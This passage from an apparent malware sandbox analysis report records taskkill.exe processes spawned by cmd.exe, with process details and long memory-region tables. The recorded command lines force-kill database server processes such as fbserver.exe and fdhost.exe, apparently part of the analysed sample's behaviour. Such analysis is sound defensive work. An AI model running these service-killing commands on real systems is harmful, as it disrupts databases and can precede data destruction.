| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:21, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:14 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8f0 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
908
0x
918
0x
8CC
0x
8C8
0x
8C0
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00520000 | 0x005dffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000005f0000 | 0x005f0000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00650000 | 0x00665fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000680000 | 0x00680000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000700000 | 0x00700000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00967fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000970000 | 0x00970000 | 0x00af0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000b00000 | 0x00b00000 | 0x01efffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001f70000 | 0x01f70000 | 0x01faffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fc0000 | 0x01fc0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002040000 | 0x02040000 | 0x0207ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002080000 | 0x02080000 | 0x0217ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02180000 | 0x0244efff | Memory Mapped File | Readable |
|
|
|
|
| fastprox.dll | 0x6a710000 | 0x6a7a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a8c0000 | 0x6a8d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a8f0000 | 0x6a918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a920000 | 0x6a97bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a980000 | 0x6a989fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a990000 | 0x6a9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a9d0000 | 0x6a9defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9e0000 | 0x6a9f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6aa00000 | 0x6aa0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM fbserver.exe /IM fbserver.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:22, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x948 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
850
0x
844
0x
848
0x
84C
0x
85C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x002c0000 | 0x00326fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00587fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000590000 | 0x00590000 | 0x00710fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00760000 | 0x00775fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x01b80000 | 0x01c3ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001c80000 | 0x01c80000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d40000 | 0x01d40000 | 0x01d7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001db0000 | 0x01db0000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001df0000 | 0x01df0000 | 0x01eeffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01ef0000 | 0x021befff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000021c0000 | 0x021c0000 | 0x021fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022a0000 | 0x022a0000 | 0x022dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022e0000 | 0x022e0000 | 0x0231ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002340000 | 0x02340000 | 0x0237ffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM fdhost.exe /IM fdhost.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:22, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x82c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
874
0x
958
0x
864
0x
868
0x
86C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00200000 | 0x00203fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x002e0000 | 0x00346fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000350000 | 0x00350000 | 0x004d7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000500000 | 0x00500000 | 0x00680fff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x00690000 | 0x0074ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x0084ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x0089ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x008c0000 | 0x008d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x01cdffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d20000 | 0x01d20000 | 0x01d5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001da0000 | 0x01da0000 | 0x01ddffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001df0000 | 0x01df0000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e60000 | 0x01e60000 | 0x01e9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01edffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fc0000 | 0x01fc0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002310000 | 0x02310000 | 0x0234ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a710000 | 0x6a7a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a8c0000 | 0x6a8d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a8f0000 | 0x6a918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a920000 | 0x6a97bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a980000 | 0x6a989fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a990000 | 0x6a9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a9d0000 | 0x6a9defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9e0000 | 0x6a9f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6aa00000 | 0x6aa0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
